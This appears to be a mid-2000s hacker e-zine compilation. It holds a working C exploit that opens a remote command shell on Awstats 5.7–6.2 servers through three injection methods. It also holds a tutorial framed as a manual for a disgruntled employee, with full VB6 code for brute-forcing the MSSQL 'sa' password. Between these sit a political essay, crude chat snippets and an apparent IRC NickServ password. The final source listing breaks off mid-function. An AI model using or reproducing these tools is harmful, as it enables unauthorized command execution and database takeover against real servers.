Key Exit Function ' Exit GetKeyError: ' Cleanup After An Error Has Occured... KeyVal = "" ' Set Return Val To Empty String GetKeyValue = False ' Return Failure rc = RegCloseKey(hKey) ' Close Registry Key End Function - Project1.VBP: Type=Exe Form=Form1.frm Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\WINDOWS\System32\ stdole2.tlb#OLE Automation Form=Form2.frm Form=frmAbout.frm Form=Form3.frm Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; COMDLG32.OCX IconForm="Form1" Startup="Form1" HelpFile="" Title="Dataskan" ExeName32="dataskan.exe" Path32="..\Binary" Command32="" Name="dataskan" HelpContextID="0" CompatibleMode="0" MajorVer=1 MinorVer=0 RevisionVer=8 AutoIncrementVer=1 ServerSupportFiles=0 VersionCompanyName="Aftermath" VersionFileDescription="Datapac Scanner" VersionLegalCopyright="Copyleft Feburary 2005" VersionProductName="Dataskan" CompilationType=0 OptimizationType=0 FavorPentiumPro(tm)=0 CodeViewDebugInfo=0 NoAliasing=0 BoundsCheck=0 OverflowCheck=0 FlPointCheck=0 FDIVCheck=0 UnroundedFP=0 StartMode=0 Unattended=0 Retained=0 ThreadPerObject=0 MaxNumberOfThreads=1 [MS Transaction Server] AutoRefresh=1 - Project1.VBW: Form1 = -3, 2, 572, 407, CZ, 0, 0, 0, 0, C Form2 = 17, 18, 464, 400, C, 0, 0, 0, 0, C frmAbout = 0, 0, 0, 0, C, 0, 0, 0, 0, C Form3 = 36, 42, 483, 424, , 0, 0, 0, 0, C -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O msg nickserv identify !31%ca oh mother fuckshit. ahahaha. I'll give you a 3 second headstart. ---------------------- IF I WERE PRESIDENT ---------------------- (*)in my first term(*) If I were president I would spearhead an initiative to buy back the Federal Reserve for the initial investment cost that the purchase contract stipulates. U.S. Currency would be tax free and tax dollars would no longer be spent re- paying loans to the FED but appropriated to public works and reform projects. If I were president I would cut back military spending and give grants to start viable alternative fuel co-ops in fuels such as bio-diesel and Ethanol /E-85. This would not only take power away from oil companies and free the U.S. from oil dependence, it would also boost the economy by reviving the dying U.S. farm industry. If I were president I would issue an executive order to legalize marijuana and the growing of hemp. (Hemp produces twice the paper per acre) If I were president I would introduce a bill to congress that strictly forbids the use of telivision advertisement to appeal to children that includes stipulations about magazine and billboard advertisements as well. If I were president I would introduce a bill to congress that forbids the use of laws and initiatives such as the Digital Millenium Copyright act and the Trusted Computing Platform which remove free information from the public domain and hinder the development of open source technologies. If I were president I would push for states rights. The United States of America is just that, states united. The federal government is the coope- ration of all states towards the greater good. It is not the rule of a government over subserviant territories. If I were president I would combat with a vengance the abuse of the legal system committed by the MPAA and RIAA. I would fight to have copyright infringement viewed as only a civil matter not a criminal matter. I would also combat the use of inflated figures and the use of terms such as "lost money" that infers that money was spent when in reality it wasn't made. If I were president I would attempt to begin a program that studies herbal medical alternatives and publishes findings to the public. All companies that devote at least 30% of their production to herbal medicines would enjoy a 25% tax cut. If I were president I would disallow companies that have major holdings in any market (or anyone who has large holdings in these companies) from don- ating to a campaign for any public office. If I were president I would permanently assign national guard units to patrol the border between Mexico and the U.S. to alleviate the explosive situation imposed by the Minuteman Militia currently patrolling the border. (*)in my second term(*) @IF ELECTED@ If I were president I would commission a search of all classified documents for human rights violations perpetrated by former leaders (President, Head of the CIA, etc) against persons in other countries. If evidence is found those who ordered the crime(s) will be deported and the evidence will be turned over to courts in the countries in which the crime(s) was/were com- mitted so that they may be prosecuted according to the law of the region in which the crime was perpetrated. If I were president I would define terrorism exactly as Merriam Webster does. If I were president I would issue an exuctive order nullifying all laws which use indescisive language that results in whim laws. These are the actions of a police state and cannot be tolerated in a nation based upon freedom. If I were president I would work with the patent office to further define what can and cannot be patented and to what degree something can progress towards human-like before it is unpatenable. Nothing found in nature (especially human genes) can be patented and all patents already issued that are found to be in violation would be revoked. It is a crime against humanity to horde information pertinant to the understanding of the human body for profit. If I were president I would make FEMA subject to the same scrutiny as any other branch of the government. Directors would be elected. Power would be limited and the budget would be disclosed in full to the public. If I were president I would extract all troops from foreign soil. If I were president I would withdraw from the U.N. until such a time that coercion tactics are ceased and nation to nation mediation can be carried out properly. A Word From The Author ______________________ The president should be a student of the constitution. A Man of the people. The president cannot base his decisions upon religous bias or personal favor. He must respect the constitution as it is the foundation of our country. Internal fraternization with corporations and abuse or neglect of the law can no longer be tolerated. Nor can talk of globalization which is a direct affront to sovereignty. We must fight back against the corpo- litical tyranny attempting to enslave us all and return the nation to it's roots in the Constitution. Yours Truly, DoobieEx 04/22/2005 -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O * beanie` is now known as beanie did you ever get the beanie baby abortion dolls? /* * Awstats exploit "shell" * code by omin0us * omin0us208 [at] gmail [dot] com * dtors security group * .:( http://dtors.ath.cx ):. * * Vulnerability reported by iDEFENSE * * The awstats exploit that was discovered allows * a user to execute arbitrary commands on the * remote server with the privileges of the httpd * * This exploit combines all three methods of exploitation * and acts as a remote "shell", parsing all returned * data to display command output and running in a loop * for continuous access. * * bash-2.05b$ awstats_shell localhost * Awstats 5.7 - 6.2 exploit Shell 0.1 * code by omin0us * dtors security group * .: http://dtors.ath.cx :. * -------------------------------------- * select exploit method: * 1. ?configdir=|cmd} * 2. ?update=1&logfile=|cmd| * 3. ?pluginmode=:system("cmd"); * * method [1/2/3]? 1 * starting shell... * (ctrl+c to exit) * sh3ll> id * uid=80(www) gid=80(www) groups=80(www) * DTORS_STOP * sh3ll> uname -a * * FreeBSD omin0us.dtors.ath.cx 4.8-RELEASE FreeBSD 4.8-RELEASE #3: Mon Oct 11 * 19:34:01 EDT 2004 omin0us@localhost:/usr/src/sys/compile/DTORS i386 * DTORS_STOP * sh3ll> * * this is licensed under the GPL */ #include #include #include #include #include #include #include #include #define PORT 80 #define CMD_BUFFER 512 #define IN_BUFFER 10000 #define MAGIC_START "DTORS_START" #define MAGIC_STOP "DTORS_STOP" void usage(char *argv[]); int main(int argc, char *argv[]){ FILE *output; int sockfd; struct sockaddr_in addr; struct hostent *host; char *host_name=NULL, *awstats_dir=NULL; char cmd[CMD_BUFFER], cmd_url[CMD_BUFFER*3], incoming[IN_BUFFER], tmp, c, cli_opt; int i, j, flag, method, verbose=0; if(argc < 2){ usage(argv); } printf("Awstats 5.7 - 6.2 exploit Shell 0.1\n"); printf("code by omin0us\n"); printf("dtors security group\n"); printf(".: http://dtors.ath.cx :.\n"); printf("--------------------------------------\n"); while(1){ cli_opt = getopt(argc, argv, "h:d:v"); if(cli_opt < 0) break; switch(cli_opt){ case 'v': verbose = 1; break; case 'd': awstats_dir = optarg; break; } } if((optind >= argc) || (strcmp(argv[optind], "-") == 0)){ printf("Please specify a Host\n"); usage(argv); } if(!awstats_dir){ awstats_dir = "/cgi-bin/awstats.pl"; } printf("select exploit method:\n" "\t1. ?configdir=|cmd}\n" "\t2. ?update=1&logfile=|cmd|\n" "\t3. ?pluginmode=:system(\"cmd\");\n"); while(method != '1' && method != '2' && method != '3'){ printf("\nmethod [1/2/3]? "); method = getchar(); } printf("starting shell...\n(ctrl+c to exit)\n"); while(1){ i=0; j=0; memset(cmd, 0, CMD_BUFFER); memset(cmd_url, 0, CMD_BUFFER*3); memset(incoming, 0, IN_BUFFER); if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ printf("Error creating socket\n"); exit(1); } if((host = gethostbyname(argv[optind])) == NULL){ printf("Could not resolv host\n"); exit(1); } addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr = *((struct in_addr *)host->h_addr); printf("sh3ll> "); fgets(cmd, CMD_BUFFER-1, stdin); if(verbose) printf("Connecting to %s (%s)...\n", host->h_name, inet_ntoa(*((struct in_addr *)host->h_addr))); if( connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) != 0){ printf("Count not connect to host\n"); exit(1); } output = fdopen(sockfd, "a"); setbuf(output, NULL); cmd[strlen(cmd)-1] = '\0'; if(strlen(cmd) == 0){ cmd[0]='i'; cmd[1]='d'; cmd[3]='\0'; } for(i=0; i= IN_BUFFER){ printf("flag [-] incoming buffer full\n"); exit(1); } if(flag==0){ printf("exploitation of host failed\n"); exit(1); } } while(strstr(incoming, MAGIC_STOP) == NULL){ read(sockfd,&tmp,1); incoming[i++] = tmp; putchar(tmp); if(i >= IN_BUFFER){ printf("putchar [-] incoming buffer full\n"); exit(1); } } printf("\n"); shutdown(sockfd, SHUT_WR); close(sockfd); fclose(output); } return(0); } void usage(char *argv[]){ printf("Usage: %s [options] \n" , argv[0]); printf("Options:\n"); printf(" -d directory of awstats script\n"); printf(" '/cgi-bin/awstats.pl' is default\n"); printf(" if no directory is specified\n\n"); printf(" -v verbose mode (optional)\n\n"); printf("example: %s -d /stats/awstats.pl website.com\n\n", argv[0]); exit(1); } -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O mike_jackson@cheesebox:~$ touch /dev/penis touch: cannot touch `/dev/penis': Permission denied mike_jackson@cheesebox:~$ ############################################################################### ## ## ## How to brute force MSSQL ## ## ## ############################################################################### h4v3n March 3, 2005 www.nettwerked.net Disclaimer ---------- If you are going to be a stupid fuck and actually use this information for attempting criminal activities you’ll probably get caught. I am releasing information that I have found, how you use it is your choice, and I am not responsible for your actions. Foreword -------- Most companies today rely more and more on the software giant Microsoft. Personally I hate Microsoft and I try to find every way to prove that they are inferior to open source software. I have nothing against a company trying to make money but what MS is doing today is not simply trying to earn a profit, they are trying to monopolize the market! In saying that, this phile shows that Microsoft provides an insecure product to the consumer for a huge price. Although in this phile I use Microsoft's own technology to break their SQL server I am still against MS and use this only as one solution to cracking a MSSQL server. The tests that prove this phile correct were performed in a controlled environment and with the owner's permission. OK think about it ... why would I not give myself the permission to do this? The tests were performed on a P4 1.4Ghz with 512MB RAM running MSSQL Server 2003 and the remote system running the attack was a Centrino laptop with 256Mb RAM. I have also performed these tests in a medium sized business network. The server was a dual Xeon running MSSQL 2003 and the users did not notice a large performance drop. This attack is designed to be used from a PC on a 10/100 internal network, and is not intended for remote internet use. The source code provided has a bug where intermediately the network traffic will stop and wait for the ODBC connection to time out. In a case where this lasts for many attempts simply stop the attack and resume. I have found that the attack will work better if a successful ODBC connection is established before the attack is run. This is very simple to do as I describe later in the phile. Again as described in the disclaimer I am in no way responsible for your actions. This information is provided here only for helping network and database administrators secure their own systems. Do not in any way use this information for malicious purposes. Again this attack is designed to work from an internal network. It is best accomplished if a person has a domain login or a MSSQL username and password. Don't worry about the rights that the username that you have, we will upgrade them very soon. In no way is this attack untraceable!!!! If you do use this attack in a malicious attack you WILL get caught and I will not write to you while you are in prison. Ok enough of that. Let's get to the good stuff. In this phile I will do things a little different from previous philes. I am adding an information section that will give you default information MSSQL server installs that should be removed. Also I will be giving simple tips to secure your MSSQL server. If you do not make these changes to your server will be vulnerable to this attack. OK let's get it on! Information ----------- There are a few things in the default installation of MSSQL server that a malicious attacker could take advantage of. First to gain access to any database you must first have to know what database you want access and have a username to that database. Well you're in luck; Microsoft has provided you all that information in the default installation. Every database has a SQL login account named "sa". The sa account (systems administrator) has administrative rights to every database in MSSQL server, by default. It's just that easy, now you have a username that you want to log in with. Next you will need a database that you want to get into. Again Microsoft has provided you with this information in the default installation. Most admin- istrators never remove the default databases. The two default databases are "Northwind" and "pubs". These are in the server as example databases and they are always there, unless removed by the administrator. Ok so now all that is needed is a password. I will get more into how to obtain that a little later. MSSQL server is not very good with holding passwords. While I was testing all this information I found out that while I was always putting in case sensitive passwords MSSQL server didn't care what case it was. So if I was putting in "AbCdE", then "abcde", or "ABCDE" would work too. Now what the hell is that all about? Customers pay enormous amounts of money to get MSSQL, the Microsoft Server OS, and then pay more money for CALs and the SQL server doesn't even keep case sensitive passwords. Well it can, if the server uses integrated security from the OS. We don't care about that because out of 4 different MSSQL servers I have seen the sa account was never integrated with the OS and all the default databases were still sitting there. These are some defaults that would make it easy for any attacker to get in fairly easy. You now know everything that you need to get into a default installation of MSSQL except the password. I will now give you the details on how to obtain the password for the sa account. The ways described to obtain passwords are in no way perfect you will also need a little bit of luck. Details ------- Now with the information provided above I am sure that anyone can figure out that a default installation of MSSQL is vulnerable to a brute force attack. So you have an angry employee on your network and they know this information, what are they going to do to come after your server? There are three stages in a MSSQL brute force attack. First you have to find out where the server is, then a brute force program will have to be written, and lastly the attack will be launched. The details of the attack will be written as a manual for a malicious user. This will make it easier to write because I have had to go through these steps and I have never had a user try to do this to one of my servers. So now it is time to start thinking like a pissed off employee that wants a little revenge. How to find out where the company has there database. This is simple, using a windows system open the control panel and open the ODBC data sources. The ODBC data source administrator is a very powerful control. This will tell use where the MSSQL server is and it will also be there to connect the brute force program to the database. On the system DSN tab click add. You will have another window come up and we are going to start creating a connection to the unknown SQL server. Use the "SQL Server" driver and click next or finish, whatever you see. Name the connection whatever you want to. I like to call it brute. Fill in the description or leave it blank. Now click the toggle button on the "server" field and WOW! there is your server. Click next and you will see a very important screen. This is where we choose to use SQL Server authentication. Do not include a login ID. Uncheck the box that is labeled "Connect to SQL Server to obtain default settings for the additional configuration options". In my experience I have found that sometimes during the brute force attack that the ODBC connection will loose this setting. So if the attack slows down or stalls this may be the reason. The rest of the connection will all be default settings. Don't try to test the connection because it will fail. Ok so now we know where the server is and we have a connection made to it. All we need now is the password for the sa account. How to we get it? Well there are many different ways to crack a MSSQL password, social eng- ineering, a dictionary attack, or my favorite BRUTE FORCE! You don't want to spend a lot of time trying to get this password but today administrators are using complex and very long passwords. If this is the case you will probably never get the password and your administrator has won the fight. If you have an admin like some I know then you crack the sa password in a few days and then you will probably have the password to other accounts. Time to decide if this is the right attack for you. First you have to understand how a brute force attack works, and how long it may take. A brute force attack goes through every ASCII combination before the correct one is found. When you launch a brute force attack on a MSSQL server we already know that we can eliminate 26 ASCII characters because there are no case sensitive passwords. Most people use all lowercase letters in a password and that makes cracking passwords very easy. When you start using numerical and non alphanumeric characters there can be 68 different characters in one position which then causes a brute force attack to take a very long time. The following table will help anyone understand how long it could take to crack a complex password. Alphabetical all lowercase Length Possible Combinations 1 26 2 702 3 18,278 4 475,254 5 12,356,630 6 321,272,406 7 8,353,082,582 8 217,180,147,158 9 5,646,683,826,134 10 146,813,779,479,510 11 3,817,158,266,467,290 12 99,246,114,928,149,500 13 2,580,398,988,131,890,000 14 67,090,373,691,429,000,000 15 1,744,349,715,977,160,000,000 16 45,353,092,615,406,000,000,000 17 1,179,180,408,000,560,000,000,000 18 30,658,690,608,014,500,000,000,000 19 797,125,955,808,376,000,000,000,000 20 20,725,274,851,017,800,000,000,000,000 Alphabetical all lower case and numbers Length Possible Combinations 1 36 2 1,332 3 47,988 4 1,727,604 5 62,193,780 6 2,238,976,116 7 80,603,140,212 8 2,901,713,047,668 9 104,461,669,716,084 10 3,760,620,109,779,060 11 135,382,323,952,046,000 12 4,873,763,662,273,660,000 13 175,455,491,841,852,000,000 14 6,316,397,706,306,670,000,000 15 227,390,317,427,040,000,000,000 16 8,186,051,427,373,440,000,000,000 17 294,697,851,385,444,000,000,000,000 18 10,609,122,649,876,000,000,000,000,000 19 381,928,415,395,535,000,000,000,000,000 20 13,749,422,954,239,300,000,000,000,000,000 Alphabetical all lower case, punctuation, and numbers Length Possible Combinations 1 68 2 4,692 3 319,124 4 21,700,500 5 1,475,634,068 6 100,343,116,692 7 6,823,331,935,124 8 463,986,571,588,500 9 31,551,086,868,018,100 10 2,145,473,907,025,230,000 11 145,892,225,677,716,000,000 12 9,920,671,346,084,660,000,000 13 674,605,651,533,757,000,000,000 14 45,873,184,304,295,500,000,000,000 15 3,119,376,532,692,090,000,000,000,000 16 212,117,604,223,062,000,000,000,000,000 17 14,423,997,087,168,200,000,000,000,000,000 18 980,831,801,927,439,000,000,000,000,000,000 19 66,696,562,531,065,900,000,000,000,000,000,000 20 4,535,366,252,112,480,000,000,000,000,000,000,000 Alphabetical upper and lowercase, punctuation and numbers Length Possible Combinations 1 94 2 8,930 3 839,514 4 78,914,410 5 7,417,954,634 6 697,287,735,690 7 65,545,047,154,954 8 6,161,234,432,565,770 9 579,156,036,661,182,000 10 54,440,667,446,151,200,000 11 5,117,422,739,938,210,000,000 12 481,037,737,554,192,000,000,000 13 45,217,547,330,094,000,000,000,000 14 4,250,449,449,028,840,000,000,000,000 15 399,542,248,208,711,000,000,000,000,000 16 37,556,971,331,618,800,000,000,000,000,000 17 3,530,355,305,172,170,000,000,000,000,000,000 18 331,853,398,686,184,000,000,000,000,000,000,000 19 31,194,219,476,501,300,000,000,000,000,000,000,000 20 2,932,256,630,791,120,000,000,000,000,000,000,000,000 Now that you have seen these staggering numbers you wish that was in your bank account. Well in one of my tests I changed the sa password to ‘zzzz’ this would be the very last password in the combinations that had 4 char- acters using only lower case letters. Well it took the program only 336 minutes. So let’s just say if the sa password is over 5 characters long or includes punctuation you will never live long enough to see the pass- word get cracked. I never said a brute force was the perfect attack. So if you think your admin is an idiot and uses small passwords you will want to continue. The next step is to create the brute force program. I chose to write this in visual basic 6 just because it is easy to write and I have a license to use MS VB6. In the program I broke down the attack into four stages weak, normal, strong, and crazy strong. If you have to use strong or the crazy strong options you will probably not get the password in your lifetime. VB6 Source Code --------------- (main.frm) Function IncrementTextStringWeak(txtWeak As String) As String Dim L As Integer, i As Integer, c As Integer Dim S As String S = txtWeak L = Len(S) For i = L To 1 Step -1 c = Asc(Mid(S, i, 1)) Select Case c Case 97 To 121 S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1) Exit For Case 122 S = Left(S, i - 1) & "a" & Mid(S, i + 1) End Select Next i If i = 0 Then IncrementTextStringWeak = String(L + 1, 97) Else IncrementTextStringWeak = S End If End Function Function IncrementTextStringNorm(txtNorm As String) As String Dim L As Integer, i As Integer, c As Integer Dim S As String S = txtNorm L = Len(S) For i = L To 1 Step -1 c = Asc(Mid(S, i, 1)) Select Case c Case 48 To 56, 97 To 121 S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1) Exit For Case 57 S = Left(S, i - 1) & "a" & Mid(S, i + 1) Exit For Case 122 S = Left(S, i - 1) & "0" & Mid(S, i + 1) End Select Next i If i = 0 Then IncrementTextStringNorm = String(L + 1, 48) Else IncrementTextStringNorm = S End If End Function Function IncrementTextStringStrong(txtStrong As String) As String Dim L As Integer, i As Integer, c As Integer Dim S As String S = txtStrong L = Len(S) For i = L To 1 Step -1 c = Asc(Mid(S, i, 1)) Select Case c Case 33 To 63, 97 To 125 S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1) Exit For Case 64 S = Left(S, i - 1) & "a" & Mid(S, i + 1) Exit For Case 126 S = Left(S, i - 1) & "!" & Mid(S, i + 1) End Select Next i If i = 0 Then IncrementTextStringStrong = String(L + 1, 33) Else IncrementTextStringStrong = S End If End Function Function IncrementTextStringCrazy(txtcrazy As String) As String Dim L As Integer, i As Integer, c As Integer Dim S As String S = txtcrazy L = Len(S) For i = L To 1 Step -1 c = Asc(Mid(S, i, 1)) Select Case c Case 33 To 125 S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1) Exit For Case 126 S = Left(S, i - 1) & "!" & Mid(S, i + 1) End Select Next i If i = 0 Then IncrementTextStringCrazy = String(L + 1, 33) Else IncrementTextStringCrazy = S End If End Function Public Sub Option1_Click(Index As Integer) Select Case Index Case 0 strength = 0 Case 1 strength = 1 Case 2 strength = 2 Case 3 strength = 3 End Select End Sub Private Sub cmdstart_Click() Option1(0).Enabled = False Option1(1).Enabled = False Option1(2).Enabled = False Option1(3).Enabled = False txtdatabase.Enabled = False txtsource.Enabled = False txtpassword.Enabled = False txtuser.Enabled = False txtprovider.Enabled = False cmdstop.Default = True cmdstart.Enabled = False cmdstop.Enabled = True Timer1.Enabled = True End Sub Private Sub cmdstop_Click() Option1(0).Enabled = True Option1(1).Enabled = True Option1(2).Enabled = True Option1(3).Enabled = True txtdatabase.Enabled = True txtsource.Enabled = True txtpassword.Enabled = True txtuser.Enabled = True txtprovider.Enabled = True cmdstart.Default = True cmdstart.Enabled = True cmdstop.Enabled = False Timer1.Enabled = False End Sub Private Sub Timer1_Timer() On Error GoTo ErrHandler Dim varserver As String Dim vardatabase As String Dim varuser As String Dim varpassword As String Dim varamount As String Dim cn As ADODB.Connection Dim conn As String Dim rs As ADODB.Recordset Dim sql As String Dim count As String Select Case strength Case 0 txtpassword.Text = IncrementTextStringWeak(txtpassword.Text) Case 1 txtpassword.Text = IncrementTextStringNorm(txtpassword.Text) Case 2 txtpassword.Text = IncrementTextStringStrong(txtpassword.Text) Case 3 txtpassword.Text = IncrementTextStringCrazy(txtpassword.Text) End Select conn = "Provider=" & txtprovider.Text conn = conn & ";Password=" conn = conn & txtpassword.Text conn = conn & ";Persist Security Info=True;User ID=" conn = conn & txtuser.Text conn = conn & ";Data Source=" conn = conn & txtsource.Text Set cn = New ADODB.Connection cn.Open conn cn.Close Set cn = Nothing Timer1.Enabled = False Option1(0).Enabled = True Option1(1).Enabled = True Option1(2).Enabled = True Option1(3).Enabled = True txtdatabase.Enabled = True txtsource.Enabled = True txtpassword.Enabled = True txtuser.Enabled = True txtprovider.Enabled = True cmdstart.Default = True cmdstart.Enabled = True cmdstop.Enabled = False Exit Sub ErrHandler: If Not cn Is Nothing Then Set cn = Nothing End Sub (modules.bas) Public strength As Integer Of course if you will have to create a visual interface with this code but that’s the easy part. Spend as much time on it as you want. You can also add functionality to the program by running it as a service or minimizing it to the system tray, but I chose not to add this in. Of course you will have to set the properties on the timer object and you will have to compile the executable but you already knew that right? Alright now we are on to step three, cracking the sa password. I first opened the ODBC connection and made sure the settings were correct and tested it with a plain user account. Open up the brute force program and select the strength that you would like the attack to run at and then enter ‘NorthWind’ as the database. In the username field enter ‘sa’, and the provider for a MSSQL database is ‘MSDASQL.1’. Hit the start button and all you have to do is wait. OK let’s say you left this program running while you went for your two week vacation and came back and you have the password. Congratulations you now have administrative access to your company’s MSSQL database! What to do now you ask? Well that is not for me to tell you. Conclusion ---------- So now all you administrators out there know not to use weak passwords and to remove all default databases out of MSSQL. Well I hate to tell you, that’s not enough. Databases are used in so many different ways and how you use your database probably opens up more ways to get into it. While writing this phile I have now noticed eight other ways to get into one MSSQL database. All I can think of now is thank “God” I found out about this before someone else did. Security on your network is not a joke! Your users probably know more than you give them credit for. So do what any smart admin does and trust no one, hack your own system then secure it. Well that’s all for now kiddies, I hope you have had an educational exper- ience reading this, and I hope you have changed your passwords on your MSSQL server to insanely long and complex text strings. Until next time watch your network because you never know who is plotting their attack. Shouts ------ tek (thanks for pushing me to finish this), the #hackcanada crew, Nettwerked (www.nettwerked.net), Hack Canada (www.hackcanada.com). Without these people and resources I would not be myself as I know today. ############################################################################### ############################################################################### ## ## ## hh 44 44 vv vv 333333 nnnnn ## ## hh 44 44 vv vv 33 nnnnnn ## ## hhhh 444444 vv vv 333333 nn nn ## ## hhhhh 44 vv vv 333333 nn nn ## ## hh hh 44 vvvv 33 nn nn ## ## hh hh 44 vv 333333 nn nn ## ## ## ############################################################################### ############################################################################### ## ## ## 111 99999 888 44 44 ## ## 1111 99 99 88 88 44 44 ## ## 11 99999 888 444444 ## ## 11 99 888 888 44 ## ## 11 99 88 88 44 ## ## 1111 99 888 44 ## ## ## ## is here ... ignorance is no excuse ## ## ## ############################################################################### ############################################################################### -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O NEVER, EVER, EVER pee after you've handled chilli peppers. Half an hour later, IT STILL BURNS. SQL Brute Source Code By: H4v3n (Notes: main.FRX excluded due to mangled code) - main.FRM: VERSION 5.00 Begin VB.Form main BackColor = &H002E0502& Caption = "SQL Brute" ClientHeight = 6435 ClientLeft = 60 ClientTop = 450 ClientWidth = 3735 Icon = "main.frx":0000 LinkTopic = "Form1" MaxButton = 0 'False ScaleHeight = 6435 ScaleWidth = 3735 StartUpPosition = 3 'Windows Default Begin VB.Frame Frame2 BackColor = &H002E0502& Caption = "Attack Strength" ForeColor = &H00FFFFFF& Height = 1695 Left = 120 TabIndex = 13 Top = 1200 Width = 3495 Begin VB.OptionButton Option1 Alignment = 1 'Right Justify BackColor = &H002E0502& ForeColor = &H00FFFFFF& Height = 195 Index = 3 Left = 2880 TabIndex = 17 Top = 1320 Width = 255 End Begin VB.OptionButton Option1 Alignment = 1 'Right Justify BackColor = &H002E0502& ForeColor = &H00FFFFFF& Height = 195 Index = 2 Left = 2880 TabIndex = 16 Top = 960 Width = 255 End Begin VB.OptionButton Option1 Alignment = 1 'Right Justify BackColor = &H002E0502& ForeColor = &H00FFFFFF& Height = 195 Index = 1 Left = 2880 TabIndex = 15 Top = 600 Width = 255 End Begin VB.OptionButton Option1 Alignment = 1 'Right Justify BackColor = &H002E0502& ForeColor = &H00FFFFFF& Height = 255 Index = 0 Left = 2880 TabIndex = 14 Top = 240 Value = -1 'True Width = 255 End Begin VB.Label Label9 BackColor = &H002E0502& Caption = "Crazy Strong (94 ASCII charactors)" ForeColor = &H00FFFFFF& Height = 255 Left = 360 TabIndex = 21 Top = 1320 Width = 2535 End Begin VB.Label Label8 BackColor = &H002E0502& Caption = "Strong (68 ASCII charactors)" ForeColor = &H00FFFFFF& Height = 255 Left = 360 TabIndex = 20 Top = 960 Width = 2175 End Begin VB.Label Label7 BackColor = &H002E0502& Caption = "Normal (lowercase alpha, numeric)" ForeColor = &H00FFFFFF& Height = 255 Left = 360 TabIndex = 19 Top = 600 Width = 2535 End Begin VB.Label Label6 BackColor = &H002E0502& Caption = "Weak (lowercase alpha)" ForeColor = &H00FFFFFF& Height = 255 Left = 360 TabIndex = 18 Top = 240 Width = 1815 End End Begin VB.CommandButton cmdstop Caption = "Stop" Enabled = 0 'False Height = 495 Left = 2040 TabIndex = 12 Top = 5760 Width = 1455 End Begin VB.Timer Timer1 Enabled = 0 'False Interval = 1 Left = 3000 Top = 5760 End Begin VB.Frame Frame1 BackColor = &H002E0502& Caption = "Options" ForeColor = &H00FFFFFF& Height = 1815 Left = 120 TabIndex = 2 Top = 3000 Width = 3495 Begin VB.TextBox txtprovider Height = 285 Left = 1200 TabIndex = 11 Text = "MSDASQL.1" Top = 1320 Width = 2175 End Begin VB.TextBox txtuser Height = 285 Left = 1200 TabIndex = 8 Text = "sa" Top = 960 Width = 2175 End Begin VB.TextBox txtsource Height = 285 Left = 1200 TabIndex = 6 Top = 600 Width = 2175 End Begin VB.TextBox txtdatabase Height = 285 Left = 1200 TabIndex = 4 Top = 240 Width = 2175 End Begin VB.Label Label5 BackColor = &H002E0502& Caption = "Provider:" ForeColor = &H00FFFFFF& Height = 255 Left = 360 TabIndex = 10 Top = 1320 Width = 735 End Begin VB.Label Label3 BackColor = &H002E0502& Caption = "Username:" ForeColor = &H00FFFFFF& Height = 255 Left = 240 TabIndex = 7 Top = 960 Width = 855 End Begin VB.Label Label2 BackColor = &H002E0502& Caption = "Data Source:" ForeColor = &H00FFFFFF& Height = 255 Left = 120 TabIndex = 5 Top = 600 Width = 975 End Begin VB.Label Label1 BackColor = &H002E0502& Caption = "Database:" ForeColor = &H00FFFFFF& Height = 255 Left = 360 TabIndex = 3 Top = 240 Width = 855 End End Begin VB.CommandButton cmdstart Caption = "Start" Default = -1 'True Height = 495 Left = 240 TabIndex = 1 Top = 5760 Width = 1455 End Begin VB.TextBox txtpassword Height = 285 Left = 120 TabIndex = 0 Top = 5280 Width = 3495 End Begin VB.Label Label4 Alignment = 2 'Center BackColor = &H002E0502& Caption = "PASSWORD" ForeColor = &H00FFFFFF& Height = 255 Left = 120 TabIndex = 9 Top = 4920 Width = 3495 End Begin VB.Image Image1 Height = 1125 Left = 0 Picture = "main.frx":08CA Top = 0 Width = 3750 End End Attribute VB_Name = "main" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Function IncrementTextStringWeak(txtWeak As String) As String Dim L As Integer, i As Integer, c As Integer Dim S As String S = txtWeak L = Len(S) For i = L To 1 Step -1 c = Asc(Mid(S, i, 1)) Select Case c Case 97 To 121 S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1) Exit For Case 122 S = Left(S, i - 1) & "a" & Mid(S, i + 1) End Select Next i If i = 0 Then IncrementTextStringWeak = String(L + 1, 97) Else IncrementTextStringWeak = S End If End Function Function IncrementTextStringNorm(txtNorm As String) As String Dim L As Integer, i As Integer, c As Integer Dim S As String S = txtNorm L = Len(S) For i = L To 1 Step -1 c = Asc(Mid(S, i, 1)) Select Case c Case 48 To 56, 97 To 121 S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1) Exit For Case 57 S = Left(S, i - 1) & "a" & Mid(S, i + 1) Exit For Case 122 S = Left(S, i - 1) & "0" & Mid(S, i + 1) End Select Next i If i = 0 Then IncrementTextStringNorm = String(L + 1, 48) Else IncrementTextStringNorm = S End If End Function Function IncrementTextStringStrong(txtStrong As String) As String Dim L As Integer, i As Integer, c As Integer Dim S As String S = txtStrong L = Len(S) For i = L To 1 Step -1 c = Asc(Mid(S, i, 1)) Select Case c Case 33 To 63, 97 To 125 S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1) Exit For Case 64 S = Left(S, i - 1) & "a" & Mid(S, i + 1) Exit For Case 126 S = Left(S, i - 1) & "!" & Mid(S, i + 1) End Select Next i If i = 0 Then IncrementTextStringStrong = String(L + 1, 33) Else 